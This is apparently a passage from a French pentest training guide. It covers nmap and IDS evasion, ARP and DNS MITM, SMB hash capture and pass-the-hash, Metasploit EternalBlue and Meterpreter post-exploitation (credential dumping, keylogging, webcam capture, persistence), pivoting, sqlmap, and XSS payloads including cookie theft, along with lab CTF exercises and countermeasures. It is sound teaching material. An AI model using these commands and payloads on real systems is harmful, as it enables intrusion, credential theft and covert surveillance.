# === SCAN COMPLET RECOMMANDE EN PENTEST ===

nmap -sV -O -sC -p- -T4 [Link] -oA scan_complet

# -oA : sorties en 3 formats (normal, XML, grepable)

# === OUTPUT ===

nmap ... -oN [Link] # Format texte normal

nmap ... -oX [Link] # Format XML (importable Metasploit)

nmap ... -oG [Link] # Format grepable

nmap ... -oA nom_base # Les 3 formats simultanément

# === EVASION IDS / FIREWALL ===

nmap -f [Link] # Fragmentation des paquets

nmap -D RND:10 [Link] # Decoys (leurres IP aleatoires)

nmap --source-port 53 [Link] # Utiliser port source 53 (DNS)

nmap --data-length 25 [Link] # Ajouter padding aleatoire

nmap -sI zombie_host [Link] # Idle scan (via zombie)

Analyse des resultats Nmap — Etats des ports :


Etat Signification Action

open Un service ecoute sur ce port Explorer le service, tester les vuln

closed Port accessible mais aucun service Surveiller (peut ouvrir plus tard)

filtered Firewall bloque les reponses Tester contournement (UDP, fragments)

unfiltered Accessible mais etat inconnu Utiliser d'autres types de scan

open|filtered Peut etre ouvert ou filtre (UDP typique) Tenter connexion directe

- 20 -
CYBERSECURITE - GUIDE COMPLET

closed|filtered Ferme ou filtre (scan idle) Verifier depuis un autre vecteur

CTF #02 - Cartographie Reseau Inconnue


Scenario

Vous demarrez une mission de pentest interne. Le seul element fourni est l'adresse reseau : [Link]/16.
Vous devez cartographier l'infrastructure, identifier les hotes actifs, les services exposes et trouver un flag
cache dans la banniere d'un service sur un port non-standard (>10000).

Objectifs

[1] Phase 1 : Ping scan pour identifier tous les hotes actifs

[2] Phase 2 : Scan -sV -sC sur les hotes decouverts

[3] Phase 3 : Scan complet -p- sur les hotes les plus interessants

[4] Phase 4 : Lire les bannieres des services (nc, netcat, telnet)

Outils suggeres

nmap -sn [Link]/16 -oG hotes_actifs.gnmap

grep 'Up' hotes_actifs.gnmap | awk '{print $2}' > [Link]

nmap -sV -sC -iL [Link] -T4 -oA scan_services

nc -nv

Indice

Scannez tous les ports avec -p- sur chaque hote. Les flags CTF sont souvent dans les bannieres de
services.

Format du flag

CTF{h0st_d1sc0v3ry_4nd_s3rv1c3_3num3r4t10n_m4st3r}

- 21 -
CYBERSECURITE - GUIDE COMPLET

MODULE 03

Securite des Protocoles Reseau


Les protocoles fondamentaux d'Internet ont ete concus sans securite. Ce module analyse leurs failles
intrinseques, demontre les attaques classiques et presente les contre-mesures adaptes a chaque
menace.

OBJECTIFS DU MODULE

✓ Comprendre les failles ARP, DNS, DHCP, HTTP et SMB

✓ Simuler une attaque Man-in-the-Middle (MITM) en lab

✓ Analyser et exploiter le SSL Stripping

✓ Mettre en place des contre-mesures reseau efficaces

✓ Utiliser Ettercap, Bettercap et Responder

3.1 ARP Poisoning — L'Attaque MITM par Excellence


ARP (Address Resolution Protocol) est un protocole sans etat et sans authentification. N'importe quel hote peut
envoyer une reponse ARP gratuite (Gratuitous ARP) pour modifier la table ARP de toute machine sur le meme
LAN. Cette vulnerabilite est la base de la majorite des attaques MITM sur reseau local.

# === SCHEMA DE L'ATTAQUE ARP POISONING ===

# Configuration normale :

Victime ([Link], MAC=AA) <--> Routeur ([Link], MAC=BB)

Table ARP victime : [Link] -> BB

Table ARP routeur : [Link] -> AA

# Apres ARP Poisoning :

Attaquant ([Link], MAC=CC) envoie :

-> a Victime : 'Je suis [Link], mon MAC=CC'

-> au Routeur : 'Je suis [Link], mon MAC=CC'

Table ARP victime : [Link] -> CC (FAUX !)

Table ARP routeur : [Link] -> CC (FAUX !)

=> Tout le trafic Victime <-> Routeur passe par l'Attaquant

# === OUTILS (LAB UNIQUEMENT) ===

# Activer l'IP forwarding (pour ne pas couper la connexion)

echo 1 > /proc/sys/net/ipv4/ip_forward

sysctl -w net.ipv4.ip_forward=1

- 22 -
CYBERSECURITE - GUIDE COMPLET

# arpspoof (dsniff package)

sudo arpspoof -i eth0 -t [Link] [Link] # Empoisonner victime

sudo arpspoof -i eth0 -t [Link] [Link] # Empoisonner routeur

# Bettercap (plus moderne et complet)

sudo bettercap -iface eth0

[Link] on # Decouvrir hotes

[Link] on # Reconnaissance continue

[Link] [Link] # Cible

[Link] on # Lancer le poisoning

[Link] on # Capturer le trafic

# Ettercap — MITM avec interface graphique/texte

sudo ettercap -T -q -i eth0 -M arp:remote /[Link]// /[Link]//

# -T : text mode -q : quiet -M arp:remote : MITM ARP

Contre-mesures ARP Spoofing

Dynamic ARP Inspection (DAI) sur les switchs manages Cisco/HP

ip arp inspection vlan 1 (Cisco IOS)

Tables ARP statiques sur les hotes critiques :

arp -s [Link] BB:BB:BB:BB:BB:BB (Linux)

Monitoring ARP avec arpwatch : apt install arpwatch

sudo arpwatch -i eth0 -m admin@[Link]

XArp (Windows/Linux) : detection en temps reel du ARP spoofing

Chiffrer tout le trafic (TLS/SSH) - le MITM devient inutile si chiffre

3.2 DNS Attacks — Poisoning, Tunneling, Hijacking


Attaque DNS Mecanisme Impact Detection

DNS Spoofing Reponse DNS falsifiee (race condition)


Redirection utilisateur Alertes DNSSEC

Cache Poisoning Corrompre le cache d'un resolveurImpact massif clients Monitoring TTL anormal

DNS Tunneling Exfiltrer des donnees via requetesContourner


DNS firewalls Entropie elevee des noms

Zone Transfer Dump complet des enregistrements


Cartographie
DNS interne Logs axfr sur serveur DNS

DNS Amplification DDoS : petite requete, grosse reponse


DDoS sur cibles tierces Monitoring volumetrique

NXDOMAIN Flood Saturer le resolveur de requetes fakes


DoS resolveur DNS Nombre NXDOMAIN/sec

DNS Rebinding Modifier le TTL pour bypasser SOP


Attaque applications web CSP + validation cote serveur

# === ENUMERATION DNS (pentest) ===

- 23 -
CYBERSECURITE - GUIDE COMPLET

dnsrecon -d [Link] -t std # Enregistrements standards

dnsrecon -d [Link] -t brt -D


/usr/share/wordlists/seclists/Discovery/DNS/[Link]

dnsenum --enum [Link]

# Test de Zone Transfer

dig axfr @[Link] [Link] # Si vuln: dump complet de la zone

host -l [Link] [Link]

# DNS Tunneling — detection

# Signes : noms tres longs, haute entropie, fort volume de requetes DNS

# Outil d'analyse : dnstop, PassiveDNS, Zeek

dnstop -l 10 eth0 # Top domaines en temps reel

# Iodine — DNS tunneling (lab)

# Serveur : iodined -f -c -P motdepasse [Link] [Link]

# Client : iodine -f -P motdepasse [Link]

# DNSSEC — verification

dig +dnssec [Link] A # Chercher flags AD, DO

delv @[Link] +rtrace [Link] # Validation complete chaine

3.3 SMB — Attaques Windows les Plus Critiques


SMB (Server Message Block) est le protocole de partage de fichiers Windows. Il a ete la source de
vulnerabilites majeures (MS08-067, MS17-010/EternalBlue, PrintNightmare). La capture et le crackage des
hash NTLM via Responder est une technique incontournable en pentest Active Directory.

# === ENUMERATION SMB ===

nmap -sV -p 139,445 [Link]

nmap --script smb-enum-shares,smb-enum-users -p 445 [Link]

nmap --script smb-os-discovery -p 445 [Link]

nmap --script smb-security-mode -p 445 [Link]

# Enumération avec smbclient

smbclient -L //[Link] -N # Lister shares (null session)

smbclient //[Link]/share -N # Connexion anonyme

smbclient //[Link]/share -U admin # Avec credentials

# enum4linux — enumeration SMB/LDAP

enum4linux -a [Link]

enum4linux -u admin -p password -a [Link]

# Vérifier EternalBlue (MS17-010)

nmap --script smb-vuln-ms17-010 -p 445 [Link]

- 24 -
CYBERSECURITE - GUIDE COMPLET

# === RESPONDER — Capture de hashes NTLM ===

sudo responder -I eth0 -wrf

# -w : WPAD -r : NBT-NS/LLMNR -f : fingerprint

# Intercepte les authentifications NTLM sur le LAN

# Les hashes sont stockes dans /usr/share/responder/logs/

# Cracker les hashes NTLMv2 avec hashcat

hashcat -m 5600 [Link] /usr/share/wordlists/[Link]

hashcat -m 5600 [Link] /usr/share/wordlists/[Link] --rules-file [Link]

# Pass-the-Hash (si on a le hash NTLM)

pth-smbclient //[Link]/C$ -U
'DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>'

impacket-psexec administrator@[Link] -hashes :<NTLM_HASH>

3.4 SSL Stripping et Attaques TLS


# === TEST DE CONFIGURATION TLS ===

[Link] [Link]

[Link] --severity HIGH [Link]

# Avec nmap

nmap --script ssl-enum-ciphers -p 443 [Link]

nmap --script ssl-cert,ssl-known-key -p 443 [Link]

# Verifier la chaine de certificats

openssl s_client -connect [Link] -showcerts

openssl s_client -connect [Link] </dev/null | openssl x509 -noout -text

# Verifier la date d'expiration

echo | openssl s_client -servername [Link] -connect [Link] 2>/dev/null |


openssl x509 -noout -dates

# === HEADERS DE SECURITE HTTP ===

curl -I [Link]

# Verifier la presence de :

# Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

# Content-Security-Policy: default-src 'self'

# X-Frame-Options: DENY

# X-Content-Type-Options: nosniff

# Referrer-Policy: strict-origin-when-cross-origin

# Permissions-Policy: geolocation=(), microphone=()

# Nikto — scanner de securite web

- 25 -
CYBERSECURITE - GUIDE COMPLET

nikto -h [Link]

nikto -h [Link] -ssl -port 443

CTF #03 - MITM Coffee Shop


Scenario

Votre lab simule un reseau Wi-Fi public dans un cafe. Deux machines virtuelles communiquent : une
'victime' qui se connecte a un site HTTP non securise avec ses credentials, et un 'routeur'. Votre mission :
position MITM + interception.

Objectifs

[1] Identifier les hotes sur le reseau de lab (nmap -sn)

[2] Lancer le ARP poisoning (bettercap ou arpspoof)

[3] Activer la capture de trafic (Wireshark ou [Link] bettercap)

[4] Extraire les credentials HTTP POST interceptes

[5] Identifier le cookie de session et documenter l'attaque

Outils suggeres

sudo bettercap -iface eth0

[Link] on && [Link] && [Link] on && [Link] on

Wireshark : filtre '[Link] == POST'

Indice

N'oubliez pas d'activer ip_forward avant arpspoof ou bettercap le fait automatiquement.

Format du flag

CTF{m1tm_c0ff33_cr3d3nt14ls_st0l3n_n0_https}

- 26 -
CYBERSECURITE - GUIDE COMPLET

MODULE 04

Analyse de Vulnerabilites
Identifier et classer les failles de securite avant qu'un attaquant ne le fasse. Ce module couvre la
methodologie de scan, l'interpretation des resultats et la validation manuelle des vulnerabilites.

OBJECTIFS DU MODULE

✓ Maitriser le systeme de notation CVE/CVSS v3.1

✓ Utiliser OpenVAS et Nessus pour des scans automatises

✓ Utiliser Searchsploit et ExploitDB efficacement

✓ Valider manuellement les resultats de scan (eviter les faux positifs)

✓ Rediger un rapport de vulnerabilites professionnel

4.1 CVE, CWE et CVSS — Le Vocabulaire des Vulnerabilites


Referentiel Signification Exemple

CVE Common Vulnerabilities & Exposures — ID unique CVE-2017-0144 (EternalBlue)

CWE Common Weakness Enumeration — type de faille CWE-89 (Injection SQL)

CVSS Score de severite 0-10 (version 3.1) CVSS:9.8 = Critique

EPSS Probabilite d'exploitation (0-100%) EPSS: 0.97 = 97% risque

KEV Known Exploited Vulnerabilities (CISA) Liste CVE activement exploitees

NVD National Vulnerability Database (NIST) [Link] — base complete

Vecteurs CVSS v3.1 — Comprendre le score :


Metrique CVSS Options possibles Impact sur le score

Attack Vector (AV) Network / Adjacent / Local / Physical Network = score max

Attack Complexity (AC) Low / High Low = score plus eleve

Privileges Required (PR) None / Low / High None = plus dangereux

User Interaction (UI) None / Required None = plus dangereux

Scope (S) Unchanged / Changed Changed = impact etendu

Confidentiality (C) None / Low / High High = score max

Integrity (I) None / Low / High High = score max

Availability (A) None / Low / High High = score max

- 27 -
CYBERSECURITE - GUIDE COMPLET

Score CVSS Severite Delai de correction recommande Exemple

9.0 - 10.0 CRITIQUE Immediate (24-48h) RCE sans authentification

7.0 - 8.9 ELEVE Sous 7 jours Elevation de privileges locale

4.0 - 6.9 MOYEN Sous 30 jours XSS reflechi, info disclosure

0.1 - 3.9 FAIBLE Prochain cycle de patching Banniere version exposee

0.0 AUCUN Informatif Bonne pratique manquante

4.2 Searchsploit et ExploitDB


# === SEARCHSPLOIT — CLI pour [Link] ===

searchsploit apache 2.4

searchsploit windows smb

searchsploit -t 'remote code execution' # Chercher dans le titre uniquement

searchsploit wordpress 5.8

# Examiner un exploit

searchsploit -x 50383 # Afficher le code de l'exploit #50383

searchsploit -m 50383 # Copier localement

searchsploit -p 50383 # Afficher le chemin complet

# Mise a jour de la base

sudo searchsploit --update

# Recherche par CVE

searchsploit --cve CVE-2021-41773

# === MSFSEARCH — Chercher dans Metasploit ===

msfconsole -q -x 'search type:exploit apache 2.4; exit'

# === AUTRES RESSOURCES ===

# [Link]

# [Link]

# [Link]

# [Link] (environnements Docker pour tester)

4.3 OpenVAS / Greenbone — Scanner Open Source


# === INSTALLATION ET SETUP ===

sudo apt install gvm -y

sudo gvm-setup # Premier lancement (15-30 min)

sudo gvm-check-setup # Verification

sudo gvm-start # Demarrer les services

- 28 -
CYBERSECURITE - GUIDE COMPLET

# Interface web : [Link]

# Login : admin / <mot_de_passe_genere_par_gvm-setup>

# === CLI avec gvm-cli ===

sudo gvm-cli socket --gmp-username admin --gmp-password PASS \

--xml '<get_version/>'

# Creer une cible

sudo gvm-cli socket --gmp-username admin --gmp-password PASS \

--xml '<create_target><name>Cible
Lab</name><hosts>[Link]/24</hosts></create_target>'

# === WORKFLOW COMPLET INTERFACE WEB ===

1. Configuration -> Targets -> New Target

(definir IP/subnet, credentials SSH/SMB optionnels)

2. Scans -> Tasks -> New Task

(selectionner cible, scanner, politique : Full and Fast)

3. Lancer le scan et surveiller l'avancement

4. Resultats -> filtrer par severite (Critical/High en premier)

5. Rapports -> telecharger en PDF/HTML/XML

# === INTERPRETATION DES RESULTATS ===

# - Lire le QoD (Quality of Detection) : 70%+ = fiable

# - Verifier chaque Critical manuellement avant exploitation

# - Les faux positifs sont frequents sur les versions bannières

4.4 Validation Manuelle — Eviter les Faux Positifs


# === VALIDATION MANUELLE D'UNE CVE ===

# Exemple : CVE-2021-41773 (Apache Path Traversal)

# 1. Verifier la version du service

curl -I [Link] | grep Server

nmap -sV -p 80 [Link]

# 2. Tenter le PoC manuellement

curl '[Link]

# 3. Comparer avec le resultat attendu (CVE description sur NVD)

# === VALIDATION HEARTBLEED (CVE-2014-0160) ===

nmap --script ssl-heartbleed -p 443 [Link]

# Ou : python heartbleed_poc.py [Link]

# === VALIDATION SHELLSHOCK (CVE-2014-6271) ===

- 29 -
CYBERSECURITE - GUIDE COMPLET

curl -H 'User-Agent: () { :; }; echo; /bin/cat /etc/passwd'


[Link]

# === BANNIERE GRABBING — identifier version sans scan ===

nc -nv [Link] 22 # Banniere SSH

nc -nv [Link] 21 # Banniere FTP

nc -nv [Link] 25 # Banniere SMTP

curl -v [Link] # Headers HTTP complets

telnet [Link] 110 # Banniere POP3

CTF #04 - Vuln Hunter


Scenario

Une machine Windows Server 2019 est exposee dans votre lab. Effectuez un scan de vulnerabilites
complet, identifiez les CVE critiques et validez manuellement les trois plus importantes. Documentez vos
trouvailles comme dans un vrai rapport.

Objectifs

[1] Lancer un scan OpenVAS ou Nessus sur la cible

[2] Lister les CVE avec score CVSS >= 7.0

[3] Valider les 3 CVE les plus critiques manuellement (nmap scripts, PoC)

[4] Identifier la CVE permettant un acces sans authentification

[5] Recuperer le flag dans C:\[Link] apres exploitation

Outils suggeres

sudo gvm-start puis scanner via [Link]

nmap --script vuln -p- [Link]

searchsploit

Indice

Cherchez notamment les services web sur des ports non-standard et les partages SMB.

Format du flag

CTF{CVE_hunt3r_v4l1d4t3d_4nd_3xpl01t3d}

- 30 -
CYBERSECURITE - GUIDE COMPLET

MODULE 05

Exploitation & Post-Exploitation


Du scan au shell — comprendre et maitriser le framework Metasploit, les techniques de
post-exploitation et les fondamentaux du pivoting.

OBJECTIFS DU MODULE

✓ Maitriser l'architecture et le workflow de Metasploit

✓ Configurer et lancer des exploits contre des cibles vulnerables

✓ Utiliser Meterpreter pour la post-exploitation avancee

✓ Comprendre et realiser une elevation de privileges

✓ Effectuer un pivot vers un sous-reseau inaccessible

✓ Maintenir la persistance de maniere discrette

5.1 Metasploit Framework — Architecture Complete


Composant Description Exemples

Exploits Code d'exploitation d'une CVE specifique ms17_010_eternalblue, ms08_067_netapi

Payloads Code execute sur la cible apres exploit meterpreter/reverse_tcp, shell/bind_tcp

Auxiliary Scan, fuzzing, DoS, brute force scanner/portscan/tcp, auxiliary/fuzz/http

Post Actions apres compromission post/multi/recon/local_exploit_suggester

Encoders Obfusquer le payload (bypass AV) x86/shikata_ga_nai, x64/xor_dynamic

Evasion Techniques anti-detection avancees windows/windows_defender_exe

Nops Sleds NOP pour alignement memoire x86/single_byte

Plugins Extensions MSF (aggregation, reporting) plugin/nessus, plugin/db_autopwn

Types de payloads :
Type Description Quand utiliser

Singles Payload autonome tout-en-un Simple, mais limite en taille

Stagers Petit loader qui telecharge le stage Bypass de taille (ShellCode limite)

Stages Payload complet charge par le stager Meterpreter, VNC...

reverse_tcp Cible se connecte a l'attaquant Contourne firewalls entrants

bind_tcp Attaquant se connecte a la cible Si l'attaquant est derriere NAT

- 31 -
CYBERSECURITE - GUIDE COMPLET

reverse_https Tunnel HTTPS vers attaquant Evasion IDS/proxy

reverse_http Tunnel HTTP vers attaquant Si HTTPS bloque

# === WORKFLOW METASPLOIT COMPLET ===

# 1. Lancer msfconsole

msfconsole -q # Mode silencieux

msfconsole -r [Link] # Executer un resource script

# 2. Connexion a la base de donnees (optionnel mais recommande)

msf6 > db_status

msf6 > workspace -a pentest_client

msf6 > db_nmap -sV -O [Link] # Nmap importe dans la BDD

msf6 > hosts # Voir les hotes

msf6 > services # Voir les services

msf6 > vulns # Voir les vulns detectees

# 3. Chercher un module

msf6 > search eternalblue

msf6 > search type:exploit platform:windows smb

msf6 > search cve:2021-44228 # Log4Shell

# 4. Selectionner et configurer

msf6 > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(ms17_010_eternalblue) > info # Documentation complete

msf6 exploit(ms17_010_eternalblue) > show options

msf6 exploit(ms17_010_eternalblue) > set RHOSTS [Link]

msf6 exploit(ms17_010_eternalblue) > set LHOST [Link]

msf6 exploit(ms17_010_eternalblue) > set LPORT 4444

msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 5. Verifier AVANT d'exploiter

msf6 exploit(ms17_010_eternalblue) > check

# 6. Exploiter

msf6 exploit(ms17_010_eternalblue) > run

msf6 exploit(ms17_010_eternalblue) > exploit -j # En arriere-plan (job)

# 7. Gerer les sessions

msf6 > sessions -l # Lister toutes les sessions

msf6 > sessions -i 1 # Interagir avec session 1

msf6 > sessions -k 1 # Tuer la session 1

msf6 > sessions -u 1 # Upgrader shell -> meterpreter

- 32 -
CYBERSECURITE - GUIDE COMPLET

5.2 Meterpreter — Reference Complete


# === INFORMATION GATHERING ===

meterpreter > sysinfo # OS, hostname, architecture

meterpreter > getuid # Utilisateur courant

meterpreter > getpid # PID du processus actuel

meterpreter > ps # Lister tous les processus

meterpreter > pgrep [Link] # Trouver PID d'un process

meterpreter > ipconfig / ifconfig # Interfaces reseau

meterpreter > route # Table de routage

meterpreter > arp # Table ARP

meterpreter > netstat # Connexions reseau actives

meterpreter > env # Variables d'environnement

# === ELEVATION DE PRIVILEGES ===

meterpreter > getprivs # Privileges actuels

meterpreter > getsystem # Essayer de devenir SYSTEM

# Methodes : Named Pipe, Token Duplication...

meterpreter > run post/multi/recon/local_exploit_suggester

# Suggere des exploits d'elevation de privileges locaux

# === EXTRACTION DE CREDENTIALS ===

meterpreter > hashdump # Hashes NTLM (necessite SYSTEM)

meterpreter > run post/windows/gather/credentials/credential_collector

meterpreter > load kiwi # Charger Mimikatz

meterpreter > kiwi_cmd sekurlsa::logonpasswords # Mots de passe en clair

meterpreter > lsa_dump_sam # SAM database

meterpreter > lsa_dump_secrets # LSA secrets

# === INTERACTION SYSTEME ===

meterpreter > shell # Shell systeme ([Link])

meterpreter > execute -f [Link] -i -H # Executer commande cachee

meterpreter > migrate <PID> # Migrer vers un autre process

# Ex: migrer vers [Link] pour la persistance

meterpreter > screenshot # Capture d'ecran

meterpreter > record_mic -d 30 # Enregistrer micro 30s

meterpreter > webcam_snap # Photo webcam

# === KEYLOGGER ===

meterpreter > keyscan_start # Demarrer keylogger

meterpreter > keyscan_dump # Recuperer les touches

meterpreter > keyscan_stop # Arreter

- 33 -
CYBERSECURITE - GUIDE COMPLET

# === FICHIERS ===

meterpreter > ls / dir # Lister fichiers

meterpreter > cat /etc/passwd # Lire fichier

meterpreter > upload /local/file /remote/path # Uploader

meterpreter > download /remote/file /local/path # Telecharger

meterpreter > search -f *.txt -d C:\ # Chercher fichiers

# === PERSISTANCE ===

meterpreter > run post/windows/manage/persistence_exe

meterpreter > run post/linux/manage/sshkey_persistence

# Ajoute une cle SSH autorisee pour acces futur

5.3 Pivoting — Atteindre les Reseaux Internes


Le pivoting consiste a utiliser une machine compromise comme relais pour acceder a des segments reseau
inaccessibles depuis notre machine d'attaque. Technique fondamentale en pentest d'infrastructure et Active
Directory.

# === SCENARIO DE PIVOTING ===

# Attaquant ([Link]) -> Machine compromise ([Link] / [Link])

# -> Reseau interne ([Link]/24) inaccessible

# === METHODE 1 : AUTOROUTE + SOCKS (Metasploit) ===

# Sur la session meterpreter

meterpreter > run post/multi/manage/autoroute -s [Link]/24

meterpreter > background

# Configurer un proxy SOCKS

msf6 > use auxiliary/server/socks_proxy

msf6 > set SRVPORT 1080

msf6 > set VERSION 5

msf6 > run -j

# Configurer proxychains (/etc/[Link])

# socks5 [Link] 1080

proxychains nmap -sT -p 80,443,445 [Link]

proxychains firefox &

# === METHODE 2 : TUNNEL SSH ===

# Port forwarding local

ssh -L 8080:[Link]:80 user@[Link]

# Maintenant localhost:8080 pointe vers [Link]:80

# Dynamic port forwarding (proxy SOCKS via SSH)

- 34 -
CYBERSECURITE - GUIDE COMPLET

ssh -D 1080 user@[Link]

proxychains nmap -sT [Link]/24

# Reverse port forwarding (si machine interne ne peut pas sortir)

ssh -R 4444:localhost:4444 user@[Link]

# === METHODE 3 : CHISEL (HTTP tunnel) ===

# Serveur (attaquant)

./chisel server -p 8080 --reverse

# Client (machine compromise)

./chisel client [Link]:8080 R:socks

# proxychains pointe vers [Link]:1080

CTF #05 - Root le Lab


Scenario

Metasploitable 2 est disponible dans votre lab. Elle contient intentionnellement de nombreux services
vulnerables. Votre objectif est d'obtenir un acces root en exploitant vsftpd 2.3.4 et de demonstrer deux
techniques de post-exploitation.

Objectifs

[1] Scanner Metasploitable 2 et identifier tous les services (nmap -sV -sC -p-)

[2] Exploiter la backdoor vsftpd 2.3.4 (port 21) via Metasploit

[3] Obtenir un shell, upgrader en meterpreter si possible

[4] Realiser un hashdump des utilisateurs

[5] Utiliser local_exploit_suggester pour identifier d'autres vecteurs

Outils suggeres

msfconsole -q

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS

run

Indice

vsftpd 2.3.4 backdoor se declenche en envoyant ':)' dans le champ username sur le port 21.

Format du flag

CTF{vsftpd_b4ckd00r_r00t_m3t4spl01t4bl3}

- 35 -
CYBERSECURITE - GUIDE COMPLET

MODULE 06

Securite des Applications Web


Les applications web sont la premiere surface d'attaque des organisations. Ce module couvre le Top
10 OWASP, les techniques d'exploitation web et l'utilisation de Burp Suite comme proxy
d'interception.

OBJECTIFS DU MODULE

✓ Maitriser le Top 10 OWASP 2021

✓ Exploiter SQLi (basique et aveugle), XSS, IDOR, SSRF, LFI/RFI

✓ Utiliser Burp Suite comme proxy d'interception et outil de fuzzing

✓ Enumerer les endpoints et repertoires caches (gobuster, ffuf)

✓ Comprendre et appliquer les corrections securisees

6.1 OWASP Top 10 2021 — Details et Exploitation


Rang Categorie Description et vecteur d'attaque

A01 Broken Access Control IDOR, path traversal, acces a ressources non autorisees

A02 Cryptographic Failures Donnees sensibles en clair, MD5/SHA1, certs invalides

A03 Injection SQLi, OS command injection, LDAP injection, NoSQLi

A04 Insecure Design Logique metier cassee, absence de threat modeling

A05 Security Misconfiguration Config par defaut, debug active, headers manquants

A06 Vulnerable Components Librairies avec CVE, dependances non mises a jour

A07 Auth & Session Failures Brute force, tokens faibles, session fixation

A08 Integrity Failures CI/CD compromis, deserialisation non securisee

A09 Logging Failures Pas de logs sur actions critiques, logs insuffisants

A10 SSRF Requetes vers ressources internes via le serveur

6.2 SQL Injection — De la Base a l'Avancee


# === TEST MANUEL SQLi ===

# Payloads de detection basiques

' OR '1'='1

' OR 1=1 --

admin'--

- 36 -
CYBERSECURITE - GUIDE COMPLET

' OR '1'='1'--

') OR ('1'='1

1; DROP TABLE users;--

# === SQLMAP — AUTOMATISATION COMPLETE ===

# Test de base sur parametre GET

sqlmap -u '[Link]

# Test sur formulaire POST

sqlmap -u '[Link] --data='username=admin&password=test'

# Depuis une requete Burp (interceptee et sauvegardee)

sqlmap -r [Link]

# Enumerer les bases de donnees

sqlmap -u '[Link] --dbs

# Enumerer les tables d'une BDD

sqlmap -u '[Link] -D mydb --tables

# Dumper une table

sqlmap -u '[Link] -D mydb -T users --dump

# Acces OS (si MySQL avec FILE privilege)

sqlmap -u '[Link] --os-shell

# Bypass WAF

sqlmap -u '[Link] --tamper=space2comment,between

# === REMEDIATION ===

# PHP PDO (requetes preparees)

$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ? AND password = ?');

$stmt->execute([$username, $password]);

# Python SQLAlchemy (ORM securise)

user = [Link](User).filter([Link] == username).first()

6.3 XSS — Cross-Site Scripting Complet


Type XSS Persistance Mecanisme Impact

Reflechi Non Parametre URL -> page immediat Phishing, vol session

Stocke Oui Payload en BDD, affiche plus tard Impact massif, persistant

DOM-based Variable Manipulation du DOM JS cote client Depends du contexte

Blind XSS Oui Admin/logs voient le payload ATO admin, SSRF interne

# === PAYLOADS XSS PAR CONTEXTE ===

- 37 -
CYBERSECURITE - GUIDE COMPLET

# Contexte HTML simple

<script>alert([Link])</script>

<img src=x onerror='fetch("[Link]

# Contexte attribut HTML

" onmouseover="alert(1)

' onfocus='alert(1)' autofocus='

# Bypass de filtres

<ScRiPt>alert(1)</sCrIpT> # Casse mixte

<svg/onload=alert(1)> # SVG

<iframe src='javascript:alert(1)'>

<details open ontoggle=alert(1)>

# Vol de cookie complet (payload stored XSS)

<script>new
Image().src='[Link]

# XSS Hunter (blind XSS)

# Creer un payload sur [Link], l'injecter dans un champ admin

# === OUTILS ===

# XSStrike — fuzzer XSS intelligent

python3 [Link] -u '[Link]

# Dalfox — scanner XSS rapide

dalfox url '[Link]

# === REMEDIATION ===

# PHP : htmlspecialchars($input, ENT_QUOTES, 'UTF-8')

# JS : [Link](userInput)

# CSP : Content-Security-Policy: default-src 'self'; script-src 'self'

6.4 Burp Suite — Guide Complet


# === CONFIGURATION DU PROXY ===

# 1. Burp Suite -> Proxy -> Options -> Listener : [Link]:8080

# 2. Navigateur -> Parametres proxy -> Manuel -> [Link]:8080

# 3. Importer le certificat Burp CA dans le navigateur

# [Link] -> Download CA Certificate

# === INTERCEPTER ET MODIFIER UNE REQUETE ===

# Proxy -> Intercept -> On

# Naviguer sur le site -> la requete est bloquee dans Burp

# Modifier les parametres -> Forward

- 38 -
CYBERSECURITE - GUIDE COMPLET

# === REPEATER — Rejouer des requetes ===

# Clic droit sur une requete -> Send to Repeater (Ctrl+R)

# Modifier et rejouer autant de fois que necessaire

# === INTRUDER — Fuzzing et brute force ===

# Clic droit -> Send to Intruder (Ctrl+I)

# Positions : marquer les parametres a fuzz (§valeur§)

# Payloads : wordlist, nombres, dates...

# Types d'attaques :

# Sniper : 1 parametre, 1 payload a la fois

# Battering ram : tous params, meme payload

# Pitchfork : N params, N wordlists (meme index)

# Cluster bomb : N params, produit cartesien des wordlists

# === SCANNER (Pro uniquement) ===

# Target -> Site map -> Clic droit -> Actively scan

# === DECODER ===

# Decoder -> encoder/decoder Base64, URL, HTML, Hex, Gzip

# === FFUF — Fuzzing rapide en CLI ===

ffuf -u [Link] -w
/usr/share/wordlists/seclists/Discovery/Web-Content/[Link]

ffuf -u [Link] -w [Link] -fc 404 # Filtrer 404

ffuf -u [Link] -w [Link] -fw 100

# Gobuster — enumeration repertoires

gobuster dir -u [Link] -w


/usr/share/wordlists/seclists/Discovery/Web-Content/[Link]

gobuster dir -u [Link] -w [Link] -x php,html,js,txt

CTF #06 - DVWA Challenge


Scenario

DVWA (Damn Vulnerable Web App) est disponible sur [Link] Completez les 3 niveaux de difficulte
des challenges SQLi et XSS.

Objectifs

[1] Niveau Low : exploiter la SQLi basique (parametre id)

[2] Niveau Medium : bypasser les filtres de base avec sqlmap --tamper

[3] Niveau Low : injecter un XSS stocke dans le champ commentaire

[4] Niveau High : bypasser le filtre XSS avec un payload avance

[5] Extraire tous les passwords de la table users de la BDD

Outils suggeres

- 39 -
CYBERSECURITE - GUIDE COMPLET

sqlmap -u '[Link] --cookie='...'

Burp Suite pour intercepter et analyser les requetes

XSStrike pour les bypasses XSS

Indice

Notez le cookie PHPSESSID et security dans vos requetes sqlmap. DVWA necessite une auth.

Format du flag

CTF{dvw4_sql1_xss_3xpl01t3d_4ll_l3v3ls}

- 40 -
CYBERSECURITE - GUIDE COMPLET

MODULE 07

Cryptographie Appliquee
Des bases mathematiques a l'attaque pratique. Ce module couvre les algorithmes de chiffrement,
PKI, et les techniques de CTF crypto.

OBJECTIFS DU MODULE

✓ Comprendre le chiffrement symetrique (AES, ChaCha20)

✓ Maitriser le chiffrement asymetrique (RSA, ECDSA)

✓ Analyser et attaquer les implementations faibles

✓ Identifier et exploiter les erreurs cryptographiques courantes

✓ Resoudre les challenges CTF crypto (Caesar, XOR, RSA faible)

7.1 Chiffrement Symetrique


Algorithme Taille cle Mode securise Statut Usage

AES-128 128 bits GCM, CCM Securise TLS, chiffrement fichiers

AES-256 256 bits GCM, CCM Recommande VPN, chiffrement disque

ChaCha20-Poly 256 bits Poly1305 MAC Recommande TLS 1.3, mobile

3DES 112/168 bits CBC Deprecie Legacy uniquement

DES 56 bits - Casse N'utilisez jamais

